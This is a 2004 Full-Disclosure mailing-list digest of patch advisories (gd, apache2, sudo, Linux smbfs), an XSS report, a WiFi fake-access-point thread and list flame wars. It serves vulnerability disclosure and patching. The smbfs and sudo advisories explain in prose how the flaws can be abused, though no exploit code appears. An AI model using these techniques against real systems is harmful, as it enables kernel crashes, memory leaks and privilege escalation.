Nicely done Skylined. Hey Jason, If you don't like FD... Might want to get on BugTraq..for your super-clean delayed news. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever Sent: Wednesday, November 17, 2004 8:59 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Mailfilters or how I learned to stop worrying and love the n00bs. Hey, I just heard of a really cool new technology called mail-filters! It works like this: 1) You set up a rule to filter out everything you don't want to read (for instance where the topic contains election fraud). 2) Go make some coffee, smoke a cigarette, code an exploit, whatever you want to do with all the free time you now have! Turns out it's not new AT ALL! Every decent mailclient has been supporting it for years!! Is that cool or what !? You can even set a filter for specific people (for instance where the from line contains Berend-Jan Wever), so you won't have to read anything I ever send to any list again! Cheers, SkyLined - Original Message - From: Esler, Joel - Contractor [EMAIL PROTECTED] To: Jason [EMAIL PROTECTED]; Eric Scher [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Wednesday, November 17, 2004 15:05 Subject: RE: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list. In my opinion, I believe this list should be moderated for about a month or so. Just to weed the bullsh*t off. J -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason Sent: Tuesday, November 16, 2004 10:20 PM To: Eric Scher Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list. tell him directly Gregh [EMAIL PROTECTED] Eric Scher wrote: [...] No point in sticking around to watch this ship finish sinking. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MDKSA-2004:132 - Updated gd packages fix integer overflows
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandrakelinux Security Update Advisory ___ Package name: gd Advisory ID:MDKSA-2004:132 Date: November 15th, 2004 Affected versions: 10.0, 10.1, 9.2, Corporate Server 2.1 __ Problem Description: Integer overflows were reported in the GD Graphics Library (libgd) 2.0.28, and possibly other versions. These overflows allow remote attackers to cause a denial of service and possibly execute arbitrary code via PNG image files with large image rows values that lead to a heap-based buffer overflow in the gdImageCreateFromPngCtx() function. The updated packages have been patched to prevent these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0990 http://www.securityfocus.com/archive/1/379382/2004-10-24/2004-10-30/0 __ Updated Packages: Mandrakelinux 10.0: b6eb93a2c4fabb8936d0578e43fc7327 10.0/RPMS/libgd2-2.0.15-4.2.100mdk.i586.rpm 36adb13537ee43cabee3e7db0e067668 10.0/RPMS/libgd2-devel-2.0.15-4.2.100mdk.i586.rpm f2289ae098ee0a1c85a11f453fb23b98 10.0/RPMS/libgd2-static-devel-2.0.15-4.2.100mdk.i586.rpm 3d8787e36d9c9f1428e45be2be21063f 10.0/RPMS/gd-utils-2.0.15-4.2.100mdk.i586.rpm 154b61cd0fb0681ec0c4b9beed816cf9 10.0/SRPMS/gd-2.0.15-4.1.100mdk.src.rpm Mandrakelinux 10.0/AMD64: 2bcfff6fde9131c316e538b5983cc233 amd64/10.0/RPMS/lib64gd2-2.0.15-4.1.100mdk.amd64.rpm 931a7b7daa74ebf171ae5f17d4b86721 amd64/10.0/RPMS/lib64gd2-devel-2.0.15-4.1.100mdk.amd64.rpm 7380075c46c95746ec00d5f093a056ed amd64/10.0/RPMS/lib64gd2-static-devel-2.0.15-4.1.100mdk.amd64.rpm 421162b00057727cb7cf12bc1e4f7536 amd64/10.0/RPMS/gd-utils-2.0.15-4.1.100mdk.amd64.rpm 154b61cd0fb0681ec0c4b9beed816cf9 amd64/10.0/SRPMS/gd-2.0.15-4.1.100mdk.src.rpm Mandrakelinux 10.1: b4d51324675c2b15f389bad27aa071a6 10.1/RPMS/libgd2-2.0.27-3.2.101mdk.i586.rpm 9a92ae816adcdf4f64999e858344a347 10.1/RPMS/libgd2-devel-2.0.27-3.2.101mdk.i586.rpm b1c5d2e9512dbd94afa8c0cbe8499147 10.1/RPMS/libgd2-static-devel-2.0.27-3.2.101mdk.i586.rpm 96102ceb0381433cebbc1a0503ce9f0b 10.1/RPMS/gd-utils-2.0.27-3.2.101mdk.i586.rpm ac871bb517ad1b1ff9693cde22a2ae7f 10.1/SRPMS/gd-2.0.27-3.2.101mdk.src.rpm Mandrakelinux 10.1/X86_64: 959cc1b6cd424a2acedc36dc76ff7d8a x86_64/10.1/RPMS/lib64gd2-2.0.27-3.2.101mdk.x86_64.rpm 689f6f6b7c20c4499153d3ef959c513b x86_64/10.1/RPMS/lib64gd2-devel-2.0.27-3.2.101mdk.x86_64.rpm e66c212cfe13192c6dddf3b6b6d216b1 x86_64/10.1/RPMS/lib64gd2-static-devel-2.0.27-3.2.101mdk.x86_64.rpm 0d7807aa1cfac9fec6d230d807a807c4 x86_64/10.1/RPMS/gd-utils-2.0.27-3.2.101mdk.x86_64.rpm ac871bb517ad1b1ff9693cde22a2ae7f x86_64/10.1/SRPMS/gd-2.0.27-3.2.101mdk.src.rpm Corporate Server 2.1: 44a7d62d7eac70e87f41ee274a4abc33 corporate/2.1/RPMS/libgd1-1.8.4-7.2.C21mdk.i586.rpm d40ffe30d2d8a374255ae5d1b834c7eb corporate/2.1/RPMS/libgd1-devel-1.8.4-7.2.C21mdk.i586.rpm 643951fb95b49a6c8d104849b022c47a corporate/2.1/RPMS/gd-utils-1.8.4-7.2.C21mdk.i586.rpm 6925a26a2ae1200be8a33a6c7984e86b corporate/2.1/SRPMS/gd-1.8.4-7.2.C21mdk.src.rpm Corporate Server 2.1/x86_64: 3be337b38e6c3dfe8cbf647c11e9bb85 x86_64/corporate/2.1/RPMS/libgd1-1.8.4-7.2.C21mdk.x86_64.rpm 03373a2561f7e2672f55bc61d3bcd7f2 x86_64/corporate/2.1/RPMS/libgd1-devel-1.8.4-7.2.C21mdk.x86_64.rpm 40785a373473ebbfbb22d64dae85712c x86_64/corporate/2.1/RPMS/gd-utils-1.8.4-7.2.C21mdk.x86_64.rpm 6925a26a2ae1200be8a33a6c7984e86b x86_64/corporate/2.1/SRPMS/gd-1.8.4-7.2.C21mdk.src.rpm Mandrakelinux 9.2: 1a2e4110e69423467f793d1cadaa185a 9.2/RPMS/libgd2-2.0.15-3.2.92mdk.i586.rpm a496a59804a42143763972a8a72a7569 9.2/RPMS/libgd2-devel-2.0.15-3.2.92mdk.i586.rpm 4b50026a3d7751101381a5efea737979 9.2/RPMS/libgd2-static-devel-2.0.15-3.2.92mdk.i586.rpm 911541635d8333e823600632c375de1b 9.2/RPMS/gd-utils-2.0.15-3.2.92mdk.i586.rpm dac4c98842eb22fcabf5d4827e5f4932 9.2/SRPMS/gd-2.0.15-3.2.92mdk.src.rpm Mandrakelinux 9.2/AMD64: 85b6214c81f804607585f08b5632e8d5 amd64/9.2/RPMS/lib64gd2-2.0.15-3.2.92mdk.amd64.rpm 37c0dab669ef7718558df3a46d599935 amd64/9.2/RPMS/lib64gd2-devel-2.0.15-3.2.92mdk.amd64.rpm 1ce580670ae7731cf6aa3cdfa250ffb8 amd64/9.2/RPMS/lib64gd2-static-devel-2.0.15-3.2.92mdk.amd64.rpm a85596a01e66b30ce225f563c52dc654 amd64/9.2/RPMS/gd-utils-2.0.15-3.2.92mdk.amd64.rpm dac4c98842eb22fcabf5d4827e5f4932 amd64/9.2/SRPMS/gd-2.0.15-3.2.92mdk.src.rpm ___ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is
[Full-Disclosure] Click and Build eCommerce Platform Cross Site Scripting
ClickandBuild: http://apply.clickandbuild.com/ Online eCommerce platform. Vulnerability The vulnerability lies in the listPos variable in the script running at cashncarrion.co.uk. It does not properly secure user inputted variables, presumably as the user is not supposed to input the variable but can do easily through the URL. I was not able to find any other unchecked variables that are printed, but there could be more. More information and examples can be found here: http://www.wheresthebeef.co.uk/XSS/clicknbuild.html and here: http://www.wheresthebeef.co.uk/XSS/cash.n.carrion.co.uk.html The vendor has been informed and claim to have fixed this problem. -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] WiFi question
As far as handheld devices to aid you in your quest go, there are several options. If you've got a Pocket PC around you can try ministumbler, which is basically the Pocket PC version of netstumbler. It's free and would probably do most of what you want. If you want more and you're willing to fork out some cash (I believe it's around $3000) AirMagnet can do some really cool stuff but it's probably overkill for you. If you're feeling brave and can get a hold of an Ipaq you can replace Windows with Familiar Linux (www.handhelds.org) and then install Kismet (www.kismetwireless.net) which is a great free WiFi detecting/sniffing utility. Kismet can even work with a gps reciever and triangulate the location of the access point (although gps systems don't tend to work well in buildings). This option is what I use since I could run it on an Ipaq I picked up off Ebay cheap and has all the features I need, plus it's free. Laters, Dave King http://www.thesecure.net [EMAIL PROTECTED] wrote: List, I'm an expert in nothing so when I saw this I had to ask, as Im sure theres someone out there that is a WiFi expert. Google has found no answer so here goes. Last night we saw a new access point appear. No problems its an ad-hoc network so its someone's machine with XP on configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4rth. Then the first two drop off, this repeats forever. Always using a different MAC address when a new AP appears. The APs are all WEP enabled (which I cant crack cos I dont have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers) so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell its coming from this office (the IT dept), basing that assumption on signal strength. Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!) Answers on a post card :) Colin. ** This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound by any agreement entered into as a result of this email, unless its intention is clearly evidenced in the body of the email. Whilst we have taken reasonable steps to ensure that this e-mail and attachments are free from viruses, recipients are advised to subject this mail to their own virus checking, in keeping with good computing practice. Please note that email received by Cadbury Schweppes Plc or its subsidiaries may be monitored in accordance with the prevailing law in the United Kingdom. ** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
On Wed, 17 Nov 2004 09:26:12 -0600, Todd Towles [EMAIL PROTECTED] wrote: I sent this to n3td3v yesterday. Why look into the news..just go to the DOJ website...st8r to the fish's mouth. Indictment for hundreds of credit cards, UK passports, state licenses, school IDs, bank accounts...etc.. Are we right in thinking it was the Full-Disclosure list who initially brought the shadowcrew site to the attention of the intelligence agencies? I was under that impression, where is the credit where its due by journalists and authorites?! I don't see much mention of Shadowcrew busted after a thread post on a security mailing list about the site. Maybe i've got my facts crossed again, but yeah. Thanks, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] WiFi question
I'm not 100% on this, as it could be something I've never heard of (of course). However, it sounds a lot like someone is playing with FakeAP: - http://www.blackalchemy.to/project/fakeap/ It's not real difficult to setup and only requires a Prisim chipset card (one or more) and a compatible Linux distro. It's been around for over 2 years, but hasn't been touched for about the same amount of time. See the site for more. -- Peace. ~G On Wed, 17 Nov 2004 13:53:07 +, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: List, I'm an expert in nothing so when I saw this I had to ask, as Im sure theres someone out there that is a WiFi expert. Google has found no answer so here goes. Last night we saw a new access point appear. No problems its an ad-hoc network so its someone's machine with XP on configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4rth. Then the first two drop off, this repeats forever. Always using a different MAC address when a new AP appears. The APs are all WEP enabled (which I cant crack cos I dont have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers) so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell its coming from this office (the IT dept), basing that assumption on signal strength. Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!) Answers on a post card :) Colin. ** This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound by any agreement entered into as a result of this email, unless its intention is clearly evidenced in the body of the email. Whilst we have taken reasonable steps to ensure that this e-mail and attachments are free from viruses, recipients are advised to subject this mail to their own virus checking, in keeping with good computing practice. Please note that email received by Cadbury Schweppes Plc or its subsidiaries may be monitored in accordance with the prevailing law in the United Kingdom. ** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Advisory 14/2004: Linux 2.x smbfs multiple remote vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 e-matters GmbH www.e-matters.de -= Security Advisory =- Advisory: Linux 2.x smbfs multiple remote vulnerabilities Release Date: 2004/11/17 Last Modified: 2004/11/17 Author: Stefan Esser [EMAIL PROTECTED] Application: Linux 2.4 = 2.4.27 Linux 2.6 = 2.6.9 Severity: Several vulnerabilities within smbfs allow crashing the kernel or leaking kernel memory with the help of the smb server Risk: Moderately Critical Vendor Status: Vendor has released a bugfixed version. Reference: http://security.e-matters.de/advisories/142004.html Overview: Linux is a clone of the operating system Unix, written from scratch by Linus Torvalds with assistance from a loosely-knit team of hackers across the Net. It aims towards POSIX and Single UNIX Specification compliance. During an audit of the smb filesystem implementation within Linux several vulnerabilities were discovered ranging from out of bounds read accesses to kernel level buffer overflows. To exploit any of these vulnerabilities an attacker needs control over the answers of the connected smb server. This could be achieved by man in the middle attacks or by taking over the smb server with f.e. the recently disclosed vulnerability in Samba 3.x While any of these vulnerabilities can be easily used as remote denial of service exploits against Linux systems, it is unclear if it is possible for a skilled local or remote attacker to use any of the possible bufferoverflows for arbitrary code execution in kernel space. Details: [ 01 - smb_proc_read(X) malicious data count overflow ] Affected Kernels: 2.4 When receiving the answer to a read(X) request the Linux 2.4 kernel trusts the returned data count and copies exactly that amound of bytes into the output buffer. This means any call to the read syscall on a smb filesystem could result in an overflow withing kernel memory if the connected smb server returns more data than requested. While this is a trivial to exploit DOS vulnerability it is unclear if it can be used by a skilled attacker to execute arbitrary code. [ 02 - smb_proc_readX malicious data offset information leak ] Affected Kernels: 2.4 When receiving the answer to a readX request the Linux 2.4 kernel does not properly bounds check the supplied data offset. The check in place can fail because of a signedness issue. This means that a local attacker can leak kernel memory simply by issuing the read syscall on a smb filesystem when the connected server returns a data offset from outside the packet. This can of course also lead to a kernel crash when unallocated memory is accessed. [ 03 - smb_receive_trans2 defragmentation overflow ] Affected Kernels: 2.4 At the end of the TRANS2 defragmentation process the complete packet is moved to another place if a certain condition is true. In combination with [07] and the fact that the counters are not bounds checked befory coyping the data this can result in a kernel memory overflow. [ 04 - smb_proc_readX_data malicious data offset DOS ] Affected Kernels: 2.6 The server supplied data offset is decremented by the header size and then used as offset within the packet. While the supplied offset is checked against an upper bound it may have underflowed and therefore point outside the allocated memory. Any access to that memory could result in a crash. [ 05 - smb_receive_trans2 malicious parm/data offset info leak/DOS ] Affected Kernels: 2.4, 2.6 Both versions of the kernel do not properly bounds check the server supplied packet based offset of the parameters/data sent. This results in smbfs copying data from memory outside the received smb fragment into the receiving buffer. This can leak kernel memory to the calling function or result in a DOS because of accesses to unallocated memory. [ 06 - smb_recv_trans2 missing fragment information leak ] Affected Kernels: 2.4, 2.6 The defragmentation process of TRANS2 SMB packets does not properly initialize the receiving buffer. An attacker may f.e. send several thousand times the first byte of a packet until the received data count reaches the expected total and so leakes the rest of the uninitialised receiving buffer to the calling function. [ 07 - smb_recv_trans2 fragment resending leads to invalid counters ] Affected Kernels: 2.4, 2.6 The defragmentation termination condition is that atleast the expected parameter count and at least the expected data count is reached. By using the fragment resending technique an attacker can increase one of those counters to an arbitrary high value.
RE: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
It's agendas like that, that segregate the information and keep it locked up in secret files that only the 3l33t you speak of have access too. A substantial technological selling point for the current governmental administration recently placed in office. I am not disputing your professional accreditation or your more-than-real passion for information disclosure. You have your reasons, and everyone should respect that. I am just merely asking you to look at where you posted your reply. On FD. In my last 3 years of network administration and network security, I have no need to go to any site so you say. I just go to my inbox and download my daily FD, and Bugtraq emails. It's all there, in plain text format. Maybe, if your agenda is a prominent as your reply made it sound, you should consider shutting down FD and the rest of the lists. In the meantime, hax0rs, phr34k3rs, FXPers carry on. I need your headaches, haxs, Bots and issues. Otherwise, who knows how I'll pay my bills. And I do get bored extremely easy. And if you all feel so inclined, post your tactics and methods to a website, so I can register an account with a bogus email and educate myself. No hard feelings n3td3v, this isn't a flame. Jim Tuttle Tuttle Information Systems. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Wednesday, November 17, 2004 10:06 AM To: Todd Towles; [EMAIL PROTECTED] Subject: Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment On Wed, 17 Nov 2004 17:53:44 +, n3td3v [EMAIL PROTECTED] wrote: On Wed, 17 Nov 2004 11:41:20 -0600, Todd Towles [EMAIL PROTECTED] wrote: Well, it is given that posting to FD does give a site exposure (good and bad). But I wouldn't say that FD was the cause of it..it was the illegal activity that was the cause of it. We all know SCC does some underground stuff and they post here each time they move. So...I wouldn't blame the FD list for anything. I wouldn't use the word blame? I think its a good thing if Full-Disclosure is helping to catch online criminals. I don't know if you like malicious hackers and other criminals, but yeah I dislike them. I would do anything in my power to stop online crime, from scriptkiddie stuff, to sex stuff,spam,scams, fraud, terrorism and back again. I have no space for anyone thinking they are elite and all the other hacker scene crap. Its time to clamp down on the BS thats on the net. If I was in gov, I would shut a site down that looks remotely hax0rish, even if they've done nothing wrong. All these crews and hacker groups, fk them all. The net needs zero tollerence with online crime. Govs should have the authority to close anything done because they feel like it, without needing to prove shit. I would even close IRC channels. Hackphreak on undernet looks harmless, but fk that. Close it anyway, its time to get a tighter grip on things. Thanks,n3td3v Same for zone-h.org, close the crap down.. f**k anything that looks remotely hax0rish. zero-tollerence!! Thanks,n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [USN-28-1] sudo vulnerability
=== Ubuntu Security Notice USN-28-1 November 17, 2004 sudo vulnerability http://www.sudo.ws/sudo/alerts/bash_functions.html === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) The following packages are affected: sudo The problem can be corrected by upgrading the affected package to version 1.6.7p5-1ubuntu4.1. In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Liam Helmer discovered an input validation flaw in sudo. When the standard shell bash starts up, it searches the environment for variables with a value beginning with (). For each of these variables a function with the same name is created, with the function body filled in from the environment variable's value. A malicious user with sudo access to a shell script that uses bash can use this feature to substitute arbitrary commands for any non-fully-qualified programs called from the script. Therefore this flaw can lead to privilege escalation. Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.1.diff.gz Size/MD5:19512 8732535adda58d8421cc40dfa0d4d277 http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.1.dsc Size/MD5: 585 cad376439bd2828752b2ea6aca5ae8ca http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5.orig.tar.gz Size/MD5: 349785 55d503e5c35bf1ea83d38244e0242aaf amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.1_amd64.deb Size/MD5: 155924 22253ea7307fdbab6c01e357a4dba9af i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.1_i386.deb Size/MD5: 145358 4492baa2b88e8707efac77943058cc07 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.1_powerpc.deb Size/MD5: 152864 18fa79642ba2ad55923a0a5f8cb771ba signature.asc Description: Digital signature
RE: [Full-Disclosure] IE is just as safe as FireFox
I recently spoke with some MS Security Execs and I know they wouldn't argue with this point. They know they have to improve and are working hard to do so. It would have been nice had they started this work 10 years or more ago but thankfully they have started now. Someone asked me to describe what I saw and heard about when I went out to Redmond to check things out recently and all I could really say is they are ramping up fast in the backend but it takes a while to spin things around when you have so many people using your product in so many ways. They truly have a ton of cool stuff they are working on and I personally had no understanding of how much was going on behind the doors and was quite surprised to see what I saw and how honest they are being about things internally. They aren't just standing there telling each other they are the greatest and all of this will just go away on its own. I realize from the outside it can look that way, I certainly had my own thoughts that way at times. It was good to see and hear that the IE team is pretty raw about the edges over the issues that have occurred over the last few years (as well they should be) and internally MS sees this and knows it and is working to correct. One thing that was asked for is that they move faster and release tools in an initially unsupported way to get the feedback sooner so the end results can be better. Right now they have a tendency to hold things close to chest for a long time testing and worrying and wanting to try and catch all possible issues so that they don't release something and get beaten up by a bunch of boneheads looking to hear their own name on lists and news broadcasts. This means a lot of stuff that they possibly have answers to don't see the light of day until a considerable time after the initial punch in the gut. I personally would be fully happy if tools were put out that were described as unsupported at the moment but we are working on finalizing it and releasing it in a supported manner. Then if a problem is found, feedback is given to MS properly and not a FD post of oh my god MS sucks because they are so stupid and I figured it out because I am so L33T, etc etc ad nauseum which this list in particular is SOOO good at. Some of the people around here shouldn't be able to breath they thump their own chest so hard and so much. Many of the others have no clue what they are talking about and simply reiterate anything they thought they heard that might be bad that they heard from someone much brighter than them. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles Sent: Tuesday, November 16, 2004 9:19 AM To: joe; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE is just as safe as FireFox Microsoft made a bold step by changing security in SP2. It was going to break stuff...and it was stupid to see people yell about that. They told us it would, we knew it would. I am glad to see they are starting to take steps toward a better systems, but Microsoft has room for improvement to say the least. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] RE: Airport x-ray software creating images of phantom weapons?
I am reading between the lines here... TSA improperly identified a weapon in a fliers bag. Instead of taking responsibility for the accident/misidentification, TSA is blaming it on the equipment. Yeah. What he said. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of David D.W. Downey Sent: Wednesday, November 17, 2004 10:35 AM To: 'Jason Coombs'; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Full-Disclosure] RE: Airport x-ray software creating images of phantom weapons? -Original Message- From: Jason Coombs [mailto:[EMAIL PROTECTED] Sent: Tuesday, November 16, 2004 12:09 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Airport x-ray software creating images of phantom weapons? My flight into Midway airport, Chicago, just sat on the runway for nearly two hours tonight because of a potential security breach in the terminal, described here: http://www.nbc5.com/news/3921217/detail.html?z=dpdpswid=22659 94dppid=65194 A Transportation Security Administration representative at Midway airport confirmed for me that the suspicious object displayed on the computerized x-ray machine may have been a phantom image similar to the one in Miami on November 13th: Software glitch in security scanner at Miami airport 'projected the image of a weapon' that didn't exist http://abclocal.go.com/ktrk/news/nat_world/111304_APnat_airport.html OK, let's stop here for a moment. Before we get to the digitizing of pictures, let's look at something here. According to the story, the man's bag had the image of a grenade in it. Yet, he was able to move away from the screening area, sit down at a set of seats _with_ his bag, then move away from there to the food courts with a friend all without being stopped, watched, tailed, or any other security measures taken regarding him. During this time, the security forces protecting the airport are informed of the potential threat, start their sweeps and find the gentleman in the food court. Let me ask a couple questions, having spent many years as a soldier, that bother me to the extreme regarding this situation. - WHY was this man allowed out of the screening area in the first place? - WHY was there no security force on either side of the mouth of the opening out of the security checkpoint? - WHY was the security force not immediately alerted to the potential threat BEFORE the man left the checkpoint? - WHY was this man allowed to move to a set of seats _having passed the security checks_ where this supposed 'ghost image' was seen? - WHY was this man then allowed to roam freely _within_ the airport to the food court? - WHY did the security forces NOT have a monitoring device or similar human presence watching this man? Notice nothing of what I have said touches on the electronic technologies used to examine baggage, personnel, or passengers, such as what caused this apparent ghost image. This is purely monitoring, notification, response, and crisis management that I'm speaking of. We have numerous holes within the security protocols at this airport that this man slipped through without even touching on the original gist of this thread. Add on the complaints Jason brought up and we have a much larger security issue in this country than most people suspect. Is it cause for panic? Hardly. Is it cause for a very serious review and a VERY firm set of response policies created? Yes, definitely. Just my 2 cents. :-) -- David D.W. Downey ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] WiFi question
Could also be RF interference. One of my coworkers tracked down a particularly interesting problem with motion sensor lights. Turns out the motion sensors worked at the 240mhz range, which has resonance at 2.4ghz, or something like that. Hence every time the motion sensor worked, it would spew what the wardriving (site survey) apps thought was a zillion different access points with widely varying MAC addresses. I would have though it was a FAKEAP program also. I would assume the same could happen with other interference. Having a common SSID would seem to indicate this is not the problem, but just thought I'd mention it. Mark Lachniet -Original Message- From: KF_lists [mailto:[EMAIL PROTECTED] Sent: Wednesday, November 17, 2004 10:21 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] WiFi question fake ap http://bsdvault.net/bsdfap.txt http://www.blackalchemy.to/project/fakeap/ -KF [EMAIL PROTECTED] wrote: List, I'm an expert in nothing so when I saw this I had to ask, as Im sure theres someone out there that is a WiFi expert. Google has found no answer so here goes. Last night we saw a new access point appear. No problems its an ad-hoc network so its someone's machine with XP on configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4rth. Then the first two drop off, this repeats forever. Always using a different MAC address when a new AP appears. The APs are all WEP enabled (which I cant crack cos I dont have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers) so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell its coming from this office (the IT dept), basing that assumption on signal strength. Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!) Answers on a post card :) Colin. ** This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound by any agreement entered into as a result of this email, unless its intention is clearly evidenced in the body of the email. Whilst we have taken reasonable steps to ensure that this e-mail and attachments are free from viruses, recipients are advised to subject this mail to their own virus checking, in keeping with good computing practice. Please note that email received by Cadbury Schweppes Plc or its subsidiaries may be monitored in accordance with the prevailing law in the United Kingdom. ** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MDKSA-2004:135 - Updated apache2 packages fix request DoS
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandrakelinux Security Update Advisory ___ Package name: apache2 Advisory ID:MDKSA-2004:135 Date: November 15th, 2004 Affected versions: 10.0, 10.1, 9.2 __ Problem Description: A vulnerability in apache 2.0.35-2.0.52 was discovered by Chintan Trivedi; he found that by sending a large amount of specially- crafted HTTP GET requests, a remote attacker could cause a Denial of Service on the httpd server. This vulnerability is due to improper enforcement of the field length limit in the header-parsing code. The updated packages have been patched to prevent this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942 http://xforce.iss.net/xforce/xfdb/17930 __ Updated Packages: Mandrakelinux 10.0: f59e6d0fc8c92b3ac3d8b39635da3633 10.0/RPMS/apache2-2.0.48-6.8.100mdk.i586.rpm 5592a7be4c4127538a5e0abaf56ddd3d 10.0/RPMS/apache2-common-2.0.48-6.8.100mdk.i586.rpm c593e119362b4987861ba3e60eadc8d6 10.0/RPMS/apache2-devel-2.0.48-6.8.100mdk.i586.rpm 623e060906c1d42d0b163edc0a3da720 10.0/RPMS/apache2-manual-2.0.48-6.8.100mdk.i586.rpm 45d7ea390fa297e75890745152d7e5ab 10.0/RPMS/apache2-mod_cache-2.0.48-6.8.100mdk.i586.rpm 29f52c3ebd003e2f40b93ebfb9232eb1 